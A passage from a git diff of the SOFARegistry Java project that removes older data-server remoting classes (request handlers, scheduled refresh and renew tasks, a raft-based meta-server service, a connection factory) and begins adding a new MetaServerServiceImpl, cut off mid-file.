com.alipay.sofa.registry.common.model.dataserver.SyncData; -import com.alipay.sofa.registry.common.model.dataserver.SyncDataRequest; -import com.alipay.sofa.registry.remoting.Channel; -import com.alipay.sofa.registry.server.data.datasync.SyncDataService; -import com.alipay.sofa.registry.server.data.remoting.handler.AbstractServerHandler; -import com.alipay.sofa.registry.util.ParaCheckUtil; -import org.springframework.beans.factory.annotation.Autowired; - -/** - * - * @author shangyu.wh - * @version $Id: SyncDataProcessor.java, v 0.1 2018-03-08 20:02 shangyu.wh Exp $ - */ -public class SyncDataHandler extends AbstractServerHandler { - - @Autowired - private SyncDataService syncDataService; - - @Override - public void checkParam(SyncDataRequest request) throws RuntimeException { - ParaCheckUtil.checkNotBlank(request.getDataInfoId(), "request.dataInfoId"); - ParaCheckUtil.checkNotBlank(request.getDataCenter(), "request.dataCenter"); - ParaCheckUtil.checkNotBlank(String.valueOf(request.getVersion()), "request.currentVersion"); - } - - @Override - public Object doHandle(Channel channel, SyncDataRequest request) { - SyncData syncData = syncDataService.getSyncDataChange(request); - return new GenericResponse().fillSucceed(syncData); - } - - @Override - public GenericResponse buildFailedResponse(String msg) { - return new GenericResponse().fillFailed(msg); - } - - @Override - public HandlerType getType() { - return HandlerType.PROCESSER; - } - - @Override - public Class interest() { - return SyncDataRequest.class; - } - - @Override - protected Node.NodeType getConnectNodeType() { - return Node.NodeType.DATA; - } -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/dataserver/task/AbstractTask.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/dataserver/task/AbstractTask.java deleted file mode 100644 index 64f80fc16..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/dataserver/task/AbstractTask.java +++ /dev/null @@ -1,77 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.remoting.dataserver.task; - -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; - -import java.util.concurrent.TimeUnit; - -/** - * - * @author qian.lqlq - * @version $Id: AbstractTask.java, v 0.1 2018-03-07 21:24 qian.lqlq Exp $ - */ -public abstract class AbstractTask implements Runnable { - - private static final Logger LOGGER = LoggerFactory.getLogger(AbstractTask.class); - - /** - * get name of task - * - * @return - */ - public String getName() { - return this.getClass().getSimpleName(); - } - - @Override - public void run() { - try { - handle(); - } catch (Throwable e) { - LOGGER.error("[{}] task execute failed", getName(), e); - } - } - - /** - * biz handle - */ - public abstract void handle(); - - /** - * get delay of task - * - * @return - */ - public abstract int getDelay(); - - /** - * get initial delay of task - * - * @return - */ - public abstract int getInitialDelay(); - - /** - * get unit of delay time or initial delay time - * - * @return - */ - public abstract TimeUnit getTimeUnit(); - -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/dataserver/task/ConnectionRefreshTask.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/dataserver/task/ConnectionRefreshTask.java deleted file mode 100644 index 6a19451ca..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/dataserver/task/ConnectionRefreshTask.java +++ /dev/null @@ -1,63 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.remoting.dataserver.task; - -import com.alipay.sofa.registry.server.data.cache.DataServerChangeItem; -import com.alipay.sofa.registry.server.data.event.DataServerChangeEvent; -import com.alipay.sofa.registry.server.data.event.EventCenter; -import com.alipay.sofa.registry.server.data.remoting.metaserver.IMetaServerService; -import org.springframework.beans.factory.annotation.Autowired; - -import java.util.concurrent.TimeUnit; - -/** - * - * @author qian.lqlq - * @version $Id: ConnectionRefreshTask.java, v 0.1 2018-03-12 21:10 qian.lqlq Exp $ - */ -public class ConnectionRefreshTask extends AbstractTask { - - @Autowired - private IMetaServerService metaServerService; - - @Autowired - private EventCenter eventCenter; - - @Override - public void handle() { - DataServerChangeItem dataServerChangeItem = metaServerService.getDateServers(); - if (dataServerChangeItem != null) { - eventCenter.post(new DataServerChangeEvent(dataServerChangeItem)); - } - } - - @Override - public int getDelay() { - return 30; - } - - @Override - public int getInitialDelay() { - return 0; - } - - @Override - public TimeUnit getTimeUnit() { - return TimeUnit.SECONDS; - } - -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/dataserver/task/ReNewNodeTask.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/dataserver/task/ReNewNodeTask.java deleted file mode 100644 index 6fda74933..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/dataserver/task/ReNewNodeTask.java +++ /dev/null @@ -1,53 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.remoting.dataserver.task; - -import com.alipay.sofa.registry.server.data.remoting.metaserver.IMetaServerService; -import org.springframework.beans.factory.annotation.Autowired; - -import java.util.concurrent.TimeUnit; - -/** - * - * @author shangyu.wh - * @version $Id: ReNewNodeTask.java, v 0.1 2018-04-02 20:56 shangyu.wh Exp $ - */ -public class ReNewNodeTask extends AbstractTask { - - @Autowired - private IMetaServerService metaServerService; - - @Override - public void handle() { - metaServerService.reNewNodeTask(); - } - - @Override - public int getDelay() { - return 3; - } - - @Override - public int getInitialDelay() { - return 0; - } - - @Override - public TimeUnit getTimeUnit() { - return TimeUnit.SECONDS; - } -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/handler/AbstractClientHandler.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/handler/AbstractClientHandler.java deleted file mode 100644 index 8f48d5166..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/handler/AbstractClientHandler.java +++ /dev/null @@ -1,132 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.remoting.handler; - -import com.alipay.sofa.registry.common.model.Node.NodeType; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.remoting.Channel; -import com.alipay.sofa.registry.remoting.ChannelHandler; - -/** - * - * @author shangyu.wh - * @version $Id: ClientHandler.java, v 0.1 2017-11-28 18:06 shangyu.wh Exp $ - */ -public abstract class AbstractClientHandler implements ChannelHandler { - - private static final Logger LOGGER = LoggerFactory.getLogger(AbstractClientHandler.class); - - @Override - public void connected(Channel channel) { - if (channel != null && channel.isConnected()) { - LOGGER - .info(getConnectNodeType() + " node connected,remote address:" - + channel.getRemoteAddress() + " localAddress:" + channel.getLocalAddress()); - } - } - - @Override - public void disconnected(Channel channel) { - if (channel != null && !channel.isConnected()) { - LOGGER - .info(getConnectNodeType() + " node disconnected,remote address:" - + channel.getRemoteAddress() + " localAddress:" + channel.getLocalAddress()); - } - } - - protected abstract NodeType getConnectNodeType(); - - @Override - public void caught(Channel channel, T message, Throwable exception) { - - } - - @Override - public void received(Channel channel, T message) { - - } - - @Override - public Object reply(Channel channel, T request) { - try { - logRequest(request); - checkParam(request); - return doHandle(channel, request); - } catch (Exception e) { - LOGGER.error("[{}] handle request failed", getClassName(), e); - return buildFailedResponse(e.getMessage()); - } - } - - /** - * check params if valid - * - * @param request - * @throws RuntimeException - */ - public abstract void checkParam(T request) throws RuntimeException; - - /** - * execute - * - * @param request - * @return - */ - public abstract Object doHandle(Channel channel, T request); - - /** - * build failed response - * - * @param msg - * @return - */ - public abstract Object buildFailedResponse(String msg); - - /** - * print request - * - * @param request - */ - protected void logRequest(T request) { - log(request.toString()); - } - - /** - * print info log - * - * @param log - */ - protected void log(String log) { - LOGGER.info(new StringBuilder("[").append(getClassName()).append("] ").append(log) - .toString()); - } - - @Override - public Class interest() { - return null; - } - - /** - * get simple name of this class - * - * @return - */ - private String getClassName() { - return this.getClass().getSimpleName(); - } -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/handler/AbstractServerHandler.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/handler/AbstractServerHandler.java deleted file mode 100644 index 34630ed39..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/handler/AbstractServerHandler.java +++ /dev/null @@ -1,142 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.remoting.handler; - -import com.alipay.sofa.registry.common.model.Node.NodeType; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.remoting.Channel; -import com.alipay.sofa.registry.remoting.ChannelHandler; -import com.alipay.sofa.registry.remoting.RemotingException; - -/** - * - * @author shangyu.wh - * @version $Id: ServerHandler.java, v 0.1 2017-11-28 18:06 shangyu.wh Exp $ - */ -public abstract class AbstractServerHandler implements ChannelHandler { - - private static final Logger LOGGER = LoggerFactory.getLogger(AbstractServerHandler.class); - - @Override - public void connected(Channel channel) throws RemotingException { - if (channel != null && channel.isConnected()) { - LOGGER - .info(getConnectNodeType() + " node connected,remote address:" - + channel.getRemoteAddress() + " localAddress:" + channel.getLocalAddress()); - } - } - - @Override - public void disconnected(Channel channel) throws RemotingException { - if (channel != null && !channel.isConnected()) { - LOGGER - .info(getConnectNodeType() + " node disconnected,remote address:" - + channel.getRemoteAddress() + " localAddress:" + channel.getLocalAddress()); - } - } - - protected NodeType getConnectNodeType() { - return NodeType.DATA; - } - - @Override - public void caught(Channel channel, T message, Throwable exception) { - - } - - @Override - public void received(Channel channel, T message) { - - } - - @Override - public Object reply(Channel channel, T request) { - try { - logRequest(channel, request); - checkParam(request); - - return doHandle(channel, request); - } catch (Exception e) { - LOGGER.error("[{}] handle request failed", getClassName(), e); - return buildFailedResponse(e.getMessage()); - } - } - - @Override - public Class interest() { - return null; - } - - /** - * check params if valid - * - * @param request - * @throws RuntimeException - */ - public abstract void checkParam(T request) throws RuntimeException; - - /** - * execute - * - * @param request - * @return - */ - public abstract Object doHandle(Channel channel, T request); - - /** - * build failed response - * - * @param msg - * @return - */ - public abstract Object buildFailedResponse(String msg); - - /** - * print request - * - * @param request - */ - protected void logRequest(Channel channel, T request) { - log(request.toString()); - if (channel != null) { - log(new StringBuilder("Remote:").append(channel.getRemoteAddress()).append(" Request:") - .append(request).toString()); - } else { - log(request.toString()); - } - } - - /** - * print info log - * - * @param log - */ - protected void log(String log) { - LOGGER.info(new StringBuilder("[").append(getClassName()).append("] ").append(log) - .toString()); - } - - /** - * get simple name of this class - * - * @return - */ - private String getClassName() { - return this.getClass().getSimpleName(); - } -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/metaserver/DefaultMetaServiceImpl.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/metaserver/DefaultMetaServiceImpl.java deleted file mode 100644 index dd9ecdc49..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/metaserver/DefaultMetaServiceImpl.java +++ /dev/null @@ -1,302 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.remoting.metaserver; - -import com.alipay.remoting.Connection; -import com.alipay.sofa.jraft.entity.PeerId; -import com.alipay.sofa.registry.common.model.Node.NodeType; -import com.alipay.sofa.registry.common.model.constants.ValueConstants; -import com.alipay.sofa.registry.common.model.metaserver.DataNode; -import com.alipay.sofa.registry.common.model.metaserver.GetNodesRequest; -import com.alipay.sofa.registry.common.model.metaserver.MetaNode; -import com.alipay.sofa.registry.common.model.metaserver.NodeChangeResult; -import com.alipay.sofa.registry.common.model.metaserver.ReNewNodesRequest; -import com.alipay.sofa.registry.common.model.store.URL; -import com.alipay.sofa.registry.jraft.bootstrap.RaftClient; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.remoting.bolt.BoltChannel; -import com.alipay.sofa.registry.remoting.exchange.message.Request; -import com.alipay.sofa.registry.server.data.bootstrap.DataServerConfig; -import com.alipay.sofa.registry.server.data.cache.DataServerChangeItem; -import com.alipay.sofa.registry.server.data.node.DataServerNode; -import com.alipay.sofa.registry.server.data.remoting.MetaNodeExchanger; -import com.alipay.sofa.registry.server.data.remoting.dataserver.DataServerNodeFactory; -import org.springframework.beans.factory.annotation.Autowired; - -import java.util.ArrayList; -import java.util.HashMap; -import java.util.HashSet; -import java.util.List; -import java.util.Map; -import java.util.Map.Entry; -import java.util.Set; -import java.util.concurrent.atomic.AtomicBoolean; -import java.util.stream.Collectors; - -/** - * - * @author qian.lqlq - * @version $Id: DefaultMetaServiceImpl.java, v 0.1 2018-03-07 20:41 qian.lqlq Exp $ - */ -public class DefaultMetaServiceImpl implements IMetaServerService { - - private static final Logger LOGGER = LoggerFactory - .getLogger(DefaultMetaServiceImpl.class); - - @Autowired - private DataServerConfig dataServerBootstrapConfig; - - @Autowired - private MetaNodeExchanger metaNodeExchanger; - - @Autowired - private MetaServerConnectionFactory metaServerConnectionFactory; - - private RaftClient raftClient; - - private AtomicBoolean clientStart = new AtomicBoolean(false); - - @Override - public Map> getMetaServerMap() { - HashMap> map = new HashMap<>(); - Set set = dataServerBootstrapConfig.getMetaServerIpAddresses(); - - Map connectionMap = metaServerConnectionFactory - .getConnections(dataServerBootstrapConfig.getLocalDataCenter()); - Connection connection = null; - try { - if (connectionMap.isEmpty()) { - connection = ((BoltChannel) metaNodeExchanger.connect(new URL( - set.iterator().next(), dataServerBootstrapConfig.getMetaServerPort()))) - .getConnection(); - } else { - connection = connectionMap.values().iterator().next(); - } - - GetNodesRequest request = new GetNodesRequest(NodeType.META); - final Connection finalConnection = connection; - Object obj = metaNodeExchanger.request(new Request() { - @Override - public Object getRequestBody() { - return request; - } - - @Override - public URL getRequestUrl() { - return new URL(finalConnection.getRemoteIP(), finalConnection.getRemotePort()); - } - }).getResult(); - if (obj instanceof NodeChangeResult) { - NodeChangeResult result = (NodeChangeResult) obj; - - Map> metaNodesMap = result.getNodes(); - if (metaNodesMap != null && !metaNodesMap.isEmpty()) { - Map metaNodeMap = metaNodesMap.get(dataServerBootstrapConfig - .getLocalDataCenter()); - if (metaNodeMap != null && !metaNodeMap.isEmpty()) { - map.put(dataServerBootstrapConfig.getLocalDataCenter(), - metaNodeMap.keySet()); - } else { - LOGGER - .error( - "[DefaultMetaServiceImpl] refresh connections from metaServer {} has no result!", - connection.getRemoteIP()); - } - } - } - } catch (Exception e) { - String con = connection != null ? connection.getRemoteIP() : "null"; - LOGGER.error("[DefaultMetaServiceImpl] refresh connections from metaServer error : {}", - con, e); - LOGGER - .warn( - "[DefaultMetaServiceImpl] refresh connections from metaServer error,refresh leader : {}", - con); - } - return map; - } - - @Override - public DataServerNode getDataServer(String dataCenter, String dataInfoId) { - return DataServerNodeFactory.computeDataServerNode(dataCenter, dataInfoId); - } - - @Override - public List getDataServers(String dataCenter, String dataInfoId) { - return DataServerNodeFactory.computeDataServerNodes(dataCenter, dataInfoId, - dataServerBootstrapConfig.getStoreNodes()); - } - - @Override - public DataServerChangeItem getDateServers() { - Map connectionMap = metaServerConnectionFactory - .getConnections(dataServerBootstrapConfig.getLocalDataCenter()); - String leader = getLeader().getIp(); - if (connectionMap.containsKey(leader)) { - Connection connection = connectionMap.get(leader); - if (connection.isFine()) { - try { - GetNodesRequest request = new GetNodesRequest(NodeType.DATA); - Object obj = metaNodeExchanger.request(new Request() { - @Override - public Object getRequestBody() { - return request; - } - - @Override - public URL getRequestUrl() { - return new URL(connection.getRemoteIP(), connection.getRemotePort()); - } - }).getResult(); - if (obj instanceof NodeChangeResult) { - NodeChangeResult result = (NodeChangeResult) obj; - Map versionMap = result.getDataCenterListVersions(); - versionMap.put(result.getLocalDataCenter(), result.getVersion()); - return new DataServerChangeItem(result.getNodes(), versionMap); - } - } catch (Exception e) { - LOGGER.error( - "[ConnectionRefreshTask] refresh connections from metaServer error : {}", - leader, e); - String newip = refreshLeader().getIp(); - LOGGER - .warn( - "[ConnectionRefreshTask] refresh connections from metaServer error,refresh leader : {}", - newip); - - } - } - } - String newip = refreshLeader().getIp(); - LOGGER.warn( - "[ConnectionRefreshTask] refresh connections metaServer not fine,refresh leader : {}", - newip); - return null; - } - - @Override - public List getOtherDataCenters() { - Set all = new HashSet<>(DataServerNodeFactory.getAllDataCenters()); - all.remove(dataServerBootstrapConfig.getLocalDataCenter()); - return new ArrayList<>(all); - } - - @Override - public void reNewNodeTask() { - Map connectionMap = metaServerConnectionFactory - .getConnections(dataServerBootstrapConfig.getLocalDataCenter()); - for (Entry connectEntry : connectionMap.entrySet()) { - String ip = connectEntry.getKey(); - //just send to leader - if (ip.equals(getLeader().getIp())) { - Connection connection = connectEntry.getValue(); - if (connection.isFine()) { - try { - ReNewNodesRequest reNewNodesRequest = new ReNewNodesRequest<>( - new DataNode(new URL(DataServerConfig.IP), - dataServerBootstrapConfig.getLocalDataCenter())); - metaNodeExchanger.request(new Request() { - @Override - public Object getRequestBody() { - return reNewNodesRequest; - } - - @Override - public URL getRequestUrl() { - return new URL(connection.getRemoteIP(), connection.getRemotePort()); - } - }).getResult(); - } catch (Exception e) { - LOGGER.error("[ReNewNodeTask] reNew data node to metaServer error : {}", - ip, e); - String newip = refreshLeader().getIp(); - LOGGER - .warn( - "[ReNewNodeTask] reNew data node to metaServer error,leader refresh: {}", - newip); - } - } else { - String newip = refreshLeader().getIp(); - LOGGER - .warn( - "[ReNewNodeTask] reNew data node to metaServer not fine,leader refresh: {}", - newip); - } - } - } - } - - @Override - public void startRaftClient() { - try { - if (clientStart.compareAndSet(false, true)) { - String serverConf = getServerConfig(); - raftClient = new RaftClient(getGroup(), serverConf); - raftClient.start(); - } - } catch (Exception e) { - LOGGER.error("Start raft client error!", e); - throw new RuntimeException("Start raft client error!", e); - } - } - - private String getServerConfig() { - String ret = ""; - Set ips = dataServerBootstrapConfig.getMetaServerIpAddresses(); - if (ips != null && !ips.isEmpty()) { - ret = ips.stream().map(ip -> ip + ":" + ValueConstants.RAFT_SERVER_PORT) - .collect(Collectors.joining(",")); - } - if (ret.isEmpty()) { - throw new IllegalArgumentException("Init raft server config error!"); - } - return ret; - } - - private String getGroup() { - return ValueConstants.RAFT_SERVER_GROUP + "_" - + dataServerBootstrapConfig.getLocalDataCenter(); - } - - @Override - public PeerId getLeader() { - if (raftClient == null) { - startRaftClient(); - } - PeerId leader = raftClient.getLeader(); - if (leader == null) { - LOGGER.error("[DefaultMetaServiceImpl] register MetaServer get no leader!"); - throw new RuntimeException( - "[DefaultMetaServiceImpl] register MetaServer get no leader!"); - } - return leader; - } - - @Override - public PeerId refreshLeader() { - if (raftClient == null) { - startRaftClient(); - } - PeerId leader = raftClient.refreshLeader(); - if (leader == null) { - LOGGER.error("[RaftClientManager] refresh MetaServer get no leader!"); - throw new RuntimeException("[RaftClientManager] refresh MetaServer get no leader!"); - } - return leader; - } -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/metaserver/IMetaServerService.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/metaserver/IMetaServerService.java deleted file mode 100644 index e98f8e453..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/metaserver/IMetaServerService.java +++ /dev/null @@ -1,94 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.remoting.metaserver; - -import com.alipay.sofa.jraft.entity.PeerId; -import com.alipay.sofa.registry.server.data.cache.DataServerChangeItem; -import com.alipay.sofa.registry.server.data.node.DataServerNode; - -import java.util.List; -import java.util.Map; -import java.util.Set; - -/** - * The interface Meta server service. - * @author qian.lqlq - * @version $Id : IMetaServerService.java, v 0.1 2018-03-07 20:41 qian.lqlq Exp $ - */ -public interface IMetaServerService { - - /** - * Gets meta server map. - * - * @return meta server map - */ - Map> getMetaServerMap(); - - /** - * Gets data server. - * - * @param dataCenter the data center - * @param dataInfoId the data info id - * @return data server - */ - DataServerNode getDataServer(String dataCenter, String dataInfoId); - - /** - * Gets data servers. - * - * @param dataCenter the data center - * @param dataInfoId the data info id - * @return the data servers - */ - List getDataServers(String dataCenter, String dataInfoId); - - /** - * Gets date servers. - * - * @return date servers - */ - DataServerChangeItem getDateServers(); - - /** - * Gets other data centers. - * - * @return other data centers - */ - List getOtherDataCenters(); - - /** - * scheduler update data server expireTime - */ - void reNewNodeTask(); - - /** - * start raft client for get leader send request - */ - void startRaftClient(); - - /** - * get raft leader - * @return - */ - PeerId getLeader(); - - /** - * renew a leader - * @return - */ - PeerId refreshLeader(); -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/metaserver/MetaServerConnectionFactory.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/metaserver/MetaServerConnectionFactory.java deleted file mode 100644 index 22fd4dc12..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/metaserver/MetaServerConnectionFactory.java +++ /dev/null @@ -1,136 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.remoting.metaserver; - -import com.alipay.remoting.Connection; - -import java.util.HashMap; -import java.util.HashSet; -import java.util.Map; -import java.util.Set; -import java.util.concurrent.ConcurrentHashMap; - -/** - * - * @author qian.lqlq - * @version $Id: MetaServerConnectionFactory.java, v 0.1 2018年03月13日 15:44 qian.lqlq Exp $ - */ -public class MetaServerConnectionFactory { - - private final Map> MAP = new ConcurrentHashMap<>(); - - /** - * - * @param dataCenter - * @param ip - * @param connection - */ - public void register(String dataCenter, String ip, Connection connection) { - - Map connectionMap = MAP.get(dataCenter); - if (connectionMap == null) { - Map newConnectionMap = new ConcurrentHashMap<>(); - connectionMap = MAP.putIfAbsent(dataCenter, newConnectionMap); - if (connectionMap == null) { - connectionMap = newConnectionMap; - } - } - - connectionMap.put(ip, connection); - } - - /** - * - * @param dataCenter - * @param ip - * @return - */ - public Connection getConnection(String dataCenter, String ip) { - if (MAP.containsKey(dataCenter)) { - Map map = MAP.get(dataCenter); - if (map.containsKey(ip)) { - return map.get(ip); - } - } - return null; - } - - /** - * - * @param dataCenter - * @return - */ - public Map getConnections(String dataCenter) { - if (MAP.containsKey(dataCenter)) { - return MAP.get(dataCenter); - } - return new HashMap<>(); - } - - /** - * - * @param dataCenter - * @return - */ - public Set getIps(String dataCenter) { - if (MAP.containsKey(dataCenter)) { - Map map = MAP.get(dataCenter); - if (map != null) { - return map.keySet(); - } - } - return new HashSet<>(); - } - - /** - * - * @param dataCenter - */ - public void remove(String dataCenter) { - Map map = getConnections(dataCenter); - if (!map.isEmpty()) { - for (Connection connection : map.values()) { - if (connection.isFine()) { - connection.close(); - } - } - } - MAP.remove(dataCenter); - } - - /** - * - * @param dataCenter - * @param ip - */ - public void remove(String dataCenter, String ip) { - if (MAP.containsKey(dataCenter)) { - Map map = MAP.get(dataCenter); - if (map != null) { - map.remove(ip); - } - } - } - - /** - * - * @return - */ - public Set getAllDataCenters() { - return MAP.keySet(); - } -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/metaserver/MetaServerServiceImpl.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/metaserver/MetaServerServiceImpl.java new file mode 100644 index 000000000..31cb02d65 --- /dev/null +++ b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/metaserver/MetaServerServiceImpl.java @@ -0,0 +1,133 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.data.remoting.metaserver; + +import com.alipay.sofa.registry.common.model.Tuple; +import com.alipay.sofa.registry.common.model.metaserver.inter.heartbeat.BaseHeartBeatResponse; +import com.alipay.sofa.registry.common.model.metaserver.inter.heartbeat.HeartbeatRequest; +import com.alipay.sofa.registry.common.model.metaserver.nodes.DataNode; +import com.alipay.sofa.registry.common.model.slot.BaseSlotStatus; +import com.alipay.sofa.registry.common.model.slot.SlotConfig; +import com.alipay.sofa.registry.common.model.slot.SlotTable; +import com.alipay.sofa.registry.common.model.store.URL; +import com.alipay.sofa.registry.server.data.bootstrap.DataServerConfig; +import com.alipay.sofa.registry.server.data.remoting.DataNodeExchanger; +import com.alipay.sofa.registry.server.data.remoting.SessionNodeExchanger; +import com.alipay.sofa.registry.server.data.slot.SlotManager; +import com.alipay.sofa.registry.server.shared.env.ServerEnv; +import com.alipay.sofa.registry.server.shared.meta.AbstractMetaServerService; +import com.alipay.sofa.registry.server.shared.slot.SlotTableRecorder; +import com.google.common.annotations.VisibleForTesting; +import java.util.List; +import java.util.Set; +import org.apache.commons.collections.CollectionUtils; +import org.springframework.beans.factory.annotation.Autowired; + +/** + * @author qian.lqlq + * @version $Id: MetaServiceImpl.java, v 0.1 2018-03-07 20:41 qian.lqlq Exp $ + */ +public class MetaServerServiceImpl extends AbstractMetaServerService + implements SlotTableRecorder { + + @Autowired private SlotManager slotManager; + + @Autowired private DataNodeExchanger dataNodeExchanger; + + @Autowired private SessionNodeExchanger sessionNodeExchanger; + + @Autowired private DataServerConfig dataServerConfig; + + private volatile SlotTable 